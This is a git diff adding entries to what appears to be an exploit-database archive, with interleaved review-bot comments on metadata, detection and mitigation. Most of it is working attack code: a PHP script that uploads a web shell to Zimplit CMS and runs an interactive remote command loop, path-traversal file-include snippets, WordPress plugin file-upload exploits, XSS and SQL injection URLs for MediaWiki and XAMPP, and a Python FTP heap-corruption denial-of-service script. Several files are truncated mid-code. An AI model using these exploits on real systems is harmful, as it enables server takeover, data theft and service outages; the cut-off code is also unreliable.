diff --git a/files.csv b/files.csv
index 3a2fb88d4..27561d762 100755
--- a/files.csv
+++ b/files.csv
@@ -6303,7 +6303,7 @@ id,file,description,date,author,platform,type,port
6735,platforms/php/webapps/6735.php,"Globsy <= 1.0 - Remote File Rewriting Exploit",2008-10-12,StAkeR,php,webapps,0
6736,platforms/php/webapps/6736.txt,"Real Estate Scripts 2008 (index.php cat) SQL Injection Vulnerability",2008-10-12,Hakxer,php,webapps,0
6737,platforms/php/webapps/6737.txt,"LokiCMS <= 0.3.4 (index.php page) Arbitrary Check File Exploit",2008-10-12,JosS,php,webapps,0
-6738,platforms/windows/dos/6738.py,"GuildFTPd 0.999.8.11/0.999.14 Heap Corruption PoC/DoS Exploit",2008-10-12,dmnt,windows,dos,0
+6738,platforms/windows/dos/6738.py,"GuildFTPd 0.999.8.11/0.999.14 - Heap Corruption PoC/DoS Exploit",2008-10-12,dmnt,windows,dos,0
6739,platforms/php/webapps/6739.txt,"NewLife Blogger <= 3.0 Insecure Cookie Handling / SQL Injection Vuln",2008-10-12,Pepelux,php,webapps,0
6740,platforms/php/webapps/6740.txt,"My PHP Indexer 1.0 (index.php) Local File Download Vulnerability",2008-10-12,JosS,php,webapps,0
6741,platforms/windows/dos/6741.py,"XM Easy Personal FTP Server 5.6.0 - Remote Denial of Service Exploit",2008-10-13,shinnai,windows,dos,0
@@ -33747,3 +33747,9 @@ id,file,description,date,author,platform,type,port
37393,platforms/lin_x86/shellcode/37393.asm,"Linux/x86 - exec('/bin/dash') shellcode (45 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0
37394,platforms/multiple/webapps/37394.txt,"Thycotic Secret Server 8.8.000004 - Stored XSS",2015-06-26,"Marco Delai",multiple,webapps,0
37395,platforms/windows/webapps/37395.txt,"ManageEngine Asset Explorer 6.1 - Stored XSS",2015-06-26,"Suraj Krishnaswami",windows,webapps,0
+37396,platforms/windows/remote/37396.txt,"XAMPP for Windows 1.7.7 Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2012-06-13,Sangteamtham,windows,remote,0
+37397,platforms/php/webapps/37397.html,"SPIP 2.x Multiple Cross Site Scripting Vulnerabilities",2012-06-13,anonymous,php,webapps,0
+37398,platforms/php/webapps/37398.php,"Zimplit CMS 3.0 Local File Include and Arbitrary File Upload Vulnerabilities",2012-06-13,KedAns-Dz,php,webapps,0
+37399,platforms/php/webapps/37399.php,"WordPress Evarisk Plugin 'uploadPhotoApres.php' Arbitrary File Upload Vulnerability",2012-01-14,"Sammy FORGIT",php,webapps,0
+37403,platforms/php/webapps/37403.php,"WordPress Invit0r Plugin 'ofc_upload_image.php' Arbitrary File Upload Vulnerability",2012-06-14,"Sammy FORGIT",php,webapps,0
+37404,platforms/php/webapps/37404.txt,"MediaWiki 1.x 'uselang' Parameter Cross Site Scripting Vulnerability",2012-06-17,anonymous,php,webapps,0
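Review bot: The six added rows do not use the `Product Version - Title` separator that this same commit applies to row 6738, for example `"SPIP 2.x Multiple Cross Site Scripting Vulnerabilities"`. Writing them as `"SPIP 2.x - Multiple Cross Site Scripting Vulnerabilities"` keeps the description column uniform for anyone parsing or searching the index. Row 37396 is filed as `windows,remote` although its body describes web-application XSS and SQL injection, so `webapps` looks like the closer type; worth confirming against the catalogue's convention. The ids jump from 37399 to 37403, and nothing in the hunk says whether 37400–37402 are intentionally absent.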
diff --git a/platforms/php/webapps/37397.html b/platforms/php/webapps/37397.html
new file mode 100755
index 000000000..da7f4cf8d
--- /dev/null
+++ b/platforms/php/webapps/37397.html
@@ -0,0 +1,87 @@
+source: http://www.securityfocus.com/bid/53983/info
+
+SPIP is prone to multiple unspecified cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Versions prior to SPIP 2.0.20, 2.1.15, and 3.0.2 are vulnerable.
+
+Exploit generator:
+------------------
+
+
+
+
+
+
XSS in SPIP Core <=3.0.1 or <=2.1.14 admin panel (base repair)
+
+ This XSS, non-persistent, use POST vars through admin panel.
+ The target is the attribute "name" of an input markup hidden.
+ This XSS work on Firefox 13, IE7, but doesn't work on Chrome.
+ Magic_quote_gcp = Off needed.
+
+
+
+
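Review bot: The affected-version statements disagree: the advisory header names fixes in 2.0.20, 2.1.15 and 3.0.2, while the title line reads `XSS in SPIP Core <=3.0.1 or <=2.1.14` and drops the 2.0.x branch. I would align it as `XSS in SPIP Core <=3.0.1, <=2.1.14 or <=2.0.19 admin panel (base repair)`. `Magic_quote_gcp` is presumably the PHP directive `magic_quotes_gpc`; the precondition line should spell it correctly and note that the directive was removed in PHP 5.4, so the remedy to record is upgrading SPIP to a fixed release rather than relying on that setting. Most of the declared 87 lines are not visible in this view, so the markup itself could not be checked.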
diff --git a/platforms/php/webapps/37398.php b/platforms/php/webapps/37398.php
new file mode 100755
index 000000000..8c1d68c32
--- /dev/null
+++ b/platforms/php/webapps/37398.php
@@ -0,0 +1,191 @@
+source: http://www.securityfocus.com/bid/53990/info
+
+Zimplit CMS is prone to multiple local file-include vulnerabilities and an arbitrary file-upload vulnerability.
+
+An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information.
+
+Zimplit CMS 3.0 is vulnerable; other versions may also be affected.
+
+1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
+0 _ __ __ __ 1
+1 /' \ __ /'__`\ /\ \__ /'__`\ 0
+0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
+1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
+0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
+1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
+0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
+1 \ \____/ >> Exploit database separated by exploit 0
+0 \/___/ type (local, remote, DoS, etc.) 1
+1 1
+0 [+] Site : 1337day.com 0
+1 [+] Support e-mail : submit[at]1337day.com 1
+0 0
+1 ######################################### 1
+0 I'm KedAns-Dz member from Inj3ct0r Team 1
+1 ######################################### 0
+0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
+
+###
+# Title : Zimplit CMS v3.0 <= (FU/XSRF/LFI) Multiple Vulnerabilities
+# Author : KedAns-Dz
+# E-mail : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com)
+# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
+# Web Site : www.1337day.com | www.inj3ct0rs.com
+# FaCeb0ok : http://fb.me/Inj3ct0rK3d
+# Friendly Sites : www.r00tw0rm.com * www.exploit-id.com * www.dis9.com
+# platform : php
+# Type : Multiple Vulnerabilities
+# Tested on : Windows XP-SP3 (Fr) / Ubuntu 10.10 (En)
+# Download : [http://www.zimplit.com/order.html]
+###
+
+# <3 <3 Greetings t0 Palestine <3 <3
+
+# Exploit's / p0c's ====>
+
+##### Exp(1) Arbitrary File/Shell Upload =>
+
+
+ |";
+print "\n|==================================================|\n";
+if ($argc < 2)
+{
+ print "\nUsage : php $argv[0] [host] [path]";
+ print "\nExample : php $argv[0] www.p0c.tld /zimplit/\n";
+ die();
+}
+$host = $argv[1];
+$path = $argv[2];
+$data = "--31337\r\n";
+$data .= "Content-Disposition: form-data; name=\"File\"; filename=\"k3d.php\"\r\n";
+$data .= "Content-Type: application/octet-stream\r\n\r\n";
+$data .= "\n";
+$data .= "--31337--\r\n";
+$packet = "POST {$path}/zimplit.php?action=upload&folder=editor/files HTTP/1.0\r\n";
+$packet .= "Host: {$host}\r\n";
+$packet .= "Content-Length: ".strlen($data)."\r\n";
+$packet .= "Content-Type: multipart/form-data; boundary=31337\r\n";
+$packet .= "Connection: close\r\n\r\n";
+$packet .= $data;
+preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
+if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
+else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
+define(STDIN, fopen("php://stdin", "r"));
+while(1)
+{
+ print "\n Inj3ct0rK3d-Sh3lL#";
+ $cmd = trim(fgets(STDIN)); # f.ex : C:\\k3d.php
+ if ($cmd != "exit")
+ {
+ $packet = "GET {$path}k3d.php{$html[3]} HTTP/1.0\r\n";
+ $packet.= "Host: {$host}\r\n";
+ $packet.= "Cmd: ".base64_encode($cmd)."\r\n"; # for Encoded You'r Shell
+ $packet.= "Connection: close\r\n\r\n";
+ $output = http_send($host, $packet);
+ if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
+ $shell = explode("_code_", $output);
+ print "\n{$shell[1]}";
+ }
+ else break;
+}
+?>
+
+
+
+
+[+] Access Shell http://[Target]/editor/files/k3d.php
+[+] Access Shell http://[Target]/editor/files/{ U R Shell }.*
+
+##### Exp(2) Edit HTML (index.html) File =>
+
+
+
+##### Exp(3) Add new HTML File/Page =>
+
+
+
+##### Exp(4) Local File Include =>
+
+
+
+
+
+
+"../../../../../../../../[ LFI ]%00"));
+curl_setopt($lfi, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($lfi);
+curl_close($lfi);
+print "$postResult";
+?>
+
+
+
+"../../../../../../../../[ LFI ]%00"));
+curl_setopt($lfi, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($lfi);
+curl_close($lfi);
+print "$postResult";
+?>
+
+#### << ThE|End
+
+#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
+# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Caddy-Dz * Mennouchi Islem * Rizky Oz * HMD-Cr3w
+# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
+# Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
+# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * TM.mOsta * HD Moore
+# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X * KeyStr0ke
+# JF * Kha&miX * Ev!LsCr!pT_Dz * KinG Of PiraTeS * TrOoN * T0xic * L3b-r1Z * Chevr0sky * Black-ID * Barbaros-DZ
+# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * Dis9-UE * All Security and Exploits Webs
+#============================================================================================================
+
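Review bot: The header describes impact but gives a defender nothing to act on, even though the request lines further down make the indicators explicit. I would add two comment lines after `# Type`, such as `# Detection: POST to zimplit.php?action=upload&folder=editor/files, followed by requests for .php files under editor/files/` and `# Mitigation: require an authenticated editor session for zimplit.php actions; serve editor/files with script execution disabled`. The `%00` suffix in the Exp(4) snippets relies on null-byte path truncation, which PHP stopped honouring in 5.3.4, so the entry should say that the file-include part depends on the PHP version as well as on Zimplit 3.0. No fixed Zimplit release is named anywhere in the file; if one exists it belongs next to the `Zimplit CMS 3.0 is vulnerable` line.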
diff --git a/platforms/php/webapps/37399.php b/platforms/php/webapps/37399.php
new file mode 100755
index 000000000..c09673bcf
--- /dev/null
+++ b/platforms/php/webapps/37399.php
@@ -0,0 +1,24 @@
+source: http://www.securityfocus.com/bid/53994/info
+
+Evarisk plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+Evarisk 5.1.5.4 is vulnerable; other versions may also be affected.
+
+";
+
+$ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/evarisk/include/lib/actionsCorrectives/activite/uploadPhotoApres.php?qqfile=lo.php");
+curl_setopt($ch, CURLOPT_POST, true);
+curl_setopt($ch, CURLOPT_POSTFIELDS, @$uploadfile);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+
+?>
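Review bot: The stated root cause, `fails to adequately sanitize user-supplied input`, is too vague for triage. The `curl_init` line suggests the stored file name and extension are taken from the `qqfile` query parameter, and 37403.php shows the same pattern with `name=lo.php` on `ofc_upload_image.php`. Both headers should say so and add what to look for, e.g. `Detection: POST requests to uploadPhotoApres.php?qqfile=*.php (Evarisk) or ofc_upload_image.php?name=*.php (Invit0r) in web-server logs`. Neither entry names a fixed plugin version; until one is confirmed, the mitigation to record is removing or access-restricting the upload script and disabling PHP execution in the plugin's upload directory. The opening lines of both scripts are cut off in this view (`";` and `ders = array(...)`), so the start of each file could not be checked.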
diff --git a/platforms/php/webapps/37403.php b/platforms/php/webapps/37403.php
new file mode 100755
index 000000000..13b56583e
--- /dev/null
+++ b/platforms/php/webapps/37403.php
@@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/53995/info
+
+Invit0r plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+Invit0r 0.22 is vulnerable; other versions may also be affected.
+
+ders = array("Content-Type: application/octet-stream");
+
+$uploadfile="";
+
+$ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/invit0r/lib/php-ofc-library/ofc_upload_image.php?name=lo.php");
+curl_setopt($ch, CURLOPT_POST, true);
+curl_setopt($ch, CURLOPT_POSTFIELDS, @$uploadfile);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+
+?>
diff --git a/platforms/php/webapps/37404.txt b/platforms/php/webapps/37404.txt
new file mode 100755
index 000000000..a7a6bee28
--- /dev/null
+++ b/platforms/php/webapps/37404.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/53998/info
+
+MediaWiki is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+MediaWiki versions prior to 1.17.5, 1.18.4, and 1.19.1 are vulnerable.
+
+http://www.example.com/wiki/Main_Page?uselang=a%27%20onmouseover=eval(alert(1))%20e=%27
\ No newline at end of file
diff --git a/platforms/windows/dos/6738.py b/platforms/windows/dos/6738.py
index 51747aaa3..8356a9df6 100755
--- a/platforms/windows/dos/6738.py
+++ b/platforms/windows/dos/6738.py
@@ -1,55 +1,55 @@
-# GuildFTPd v0.999.8.11/v0.999.14 heap corruption PoC/DoS exploit
-# GuildFTPd URL - http://www.guildftpd.com
-# cwd/list heap corruption
-# overwrite registers in free(): ecx, edi
-#
-# (x)dmnt 2008
-# feel free to do shellcode
-# -*- coding: windows-1252 -*-
-
-import socket
-import sys, time
-
-evil_cwd = "/."*124
-evil_dir = "X"*100
-
-def help_info():
- print ("Usage: guildd0s \n")
- print ("Note: anonymous is enought\n")
-
-def dos_it(hostname, username, passwd):
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- try:
- sock.connect((hostname, 21))
- except:
- print ("[-] Connection error!")
- sys.exit(1)
- r=sock.recv(1024)
- print "[+] " + r
- sock.send("user %s\n" %username)
- r=sock.recv(1024)
- sock.send("pass %s\n" %passwd)
- r=sock.recv(1024)
- print "[+] Send evil string"
- sock.send("cwd %s\n" %evil_cwd)
- r=sock.recv(1024)
- sock.send("list %s\r\n" %evil_dir)
- time.sleep(3)
- sock.close()
- print "[!] Now server d0s'ed/heap corrupted"
-
-print ("\n]GuildFTPd v0.999.8.11/v0.999.14 remote heap corruption PoC/DoS exploit[")
-print ("](x)dmnt 2008[\n\n")
-
-if len(sys.argv) <> 4:
- help_info()
- sys.exit(1)
-
-else:
- hostname=sys.argv[1]
- username=sys.argv[2]
- passwd=sys.argv[3]
- dos_it(hostname,username,passwd)
- sys.exit(0)
-
-# milw0rm.com [2008-10-12]
+# GuildFTPd v0.999.8.11/v0.999.14 heap corruption PoC/DoS exploit
+# GuildFTPd URL - http://www.guildftpd.com
+# cwd/list heap corruption
+# overwrite registers in free(): ecx, edi
+#
+# (x)dmnt 2008
+# feel free to do shellcode
+# -*- coding: windows-1252 -*-
+
+import socket
+import sys, time
+
+evil_cwd = "/."*124
+evil_dir = "X"*100
+
+def help_info():
+ print ("Usage: guildd0s \n")
+ print ("Note: anonymous is enought\n")
+
+def dos_it(hostname, username, passwd):
+ sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ try:
+ sock.connect((hostname, 21))
+ except:
+ print ("[-] Connection error!")
+ sys.exit(1)
+ r=sock.recv(1024)
+ print "[+] " + r
+ sock.send("user %s\n" %username)
+ r=sock.recv(1024)
+ sock.send("pass %s\n" %passwd)
+ r=sock.recv(1024)
+ print "[+] Send evil string"
+ sock.send("cwd %s\n" %evil_cwd)
+ r=sock.recv(1024)
+ sock.send("list %s\r\n" %evil_dir)
+ time.sleep(3)
+ sock.close()
+ print "[!] Now server d0s'ed/heap corrupted"
+
+print ("\n]GuildFTPd v0.999.8.11/v0.999.14 remote heap corruption PoC/DoS exploit[")
+print ("](x)dmnt 2008[\n\n")
+
+if len(sys.argv) <> 4:
+ help_info()
+ sys.exit(1)
+
+else:
+ hostname=sys.argv[1]
+ username=sys.argv[2]
+ passwd=sys.argv[3]
+ dos_it(hostname,username,passwd)
+ sys.exit(0)
+
+# milw0rm.com [2008-10-12]
diff --git a/platforms/windows/remote/37396.txt b/platforms/windows/remote/37396.txt
new file mode 100755
index 000000000..d2f059cbd
--- /dev/null
+++ b/platforms/windows/remote/37396.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/53979/info
+
+XAMPP for Windows is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/xampp/perlinfo.pl/"
+
+http://www.example.com/xampp/cds.php/%27onmouseover=alert%28%22XSS%22%29%3E
+
+http://www.example.com/xampp/cds.php?interpret=1&jahr=1967 and sleep(1) &titel=555-666-0606
\ No newline at end of file
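Review bot: The body never states the affected release; `1.7.7` appears only in the files.csv title, so a reader who opens this file alone cannot tell which XAMPP builds to check. Add a line in the style of the sibling entries, such as `XAMPP for Windows 1.7.7 is vulnerable; other versions may also be affected.` The three URLs are also unlabeled: marking the `perlinfo.pl` and `cds.php/` path cases as XSS and the `cds.php?interpret=1&jahr=...` case as SQL injection would let someone write log-matching rules without guessing. The first URL ends at `perlinfo.pl/"` and looks truncated.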